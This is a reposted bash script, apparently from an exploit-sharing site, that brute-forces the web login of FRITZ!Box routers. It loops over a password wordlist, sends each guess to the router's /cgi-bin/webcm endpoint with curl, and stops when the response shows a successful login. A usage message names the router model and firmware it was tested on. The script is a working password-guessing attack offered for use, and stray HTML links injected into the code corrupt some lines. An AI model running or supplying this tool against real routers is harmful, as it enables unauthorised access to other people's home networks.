[php]
#!/bin/bash –
# Bruteforce Fritz!Box
# Code by brixton brixton [dot] hackermail [dot] com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA#
#
clear
if ! test -e .brutefritz.<a href="http://www.php.net/log">log</a>
then
<a href="http://www.php.net/touch">touch</a> .brutefritz.<a href="http://www.php.net/log">log</a>
else
echo "" &gt;.brutefritz.<a href="http://www.php.net/log">log</a>
fi
scan()
{
banner
while read line
do
curl -d "login:command/password=$line" \
-d "getpage=../html/de/menus/menu2.html" \
-d "errorpage=../html/index.html" \
-d "var:lang=de" \
-d "var:pagename=home" \
-d "var:menu=home" \
-s http://$1/cgi-bin/webcm | grep Assistenten &gt;.brutefritz.log
if [ "$(cat .brutefritz.log)" = "" ]
then echo "+++Password no access -&gt;$line"
else echo "+++Password found :) -&gt;$line"
<a href="http://www.php.net/exit">exit</a>
fi
done &lt; $2
}
banner()
{
echo "
\|||/
(o o)
,~~~ooO~~(_)~~~~~~~~~,
| briXtons Fritz!Box |
| Bruteforce |
| Version 1 |
| |
‚~~~~~~~~~~~~~~ooO~~~‘
|__|__|
|| ||
ooO Ooo
"
}
usage()
{
banner
echo "
$0 -i &lt;ip/url&gt; -w &lt;wordlistfile&gt;
$0 -h this help
example:
$0 -i 192.168.178.1 -w wordlists.lst
testet with FRITZ!Box WLAN 3170 -&gt; Firmware-Version 49.04.58 -&gt;Linux ubuntu 2.6.32-24-generic
"
}
while getopts "w:i:h" Option
do
case $Option in
w) WORDLIST=$OPTARG;;
i) IP=$OPTARG;;
h) usage;exit;;
*) usage;exit;;
esac
done
if [ "$IP" = "" ];then echo "no ip or url";exit;fi
if [ -e $WORDLIST ]; then
scan $IP $WORDLIST
else
echo "File $WORDLIST does not exists"
fi
[/php]
Quelle : http://www.exploit-id.com/cracker/fritzbox-bruteforcing-utility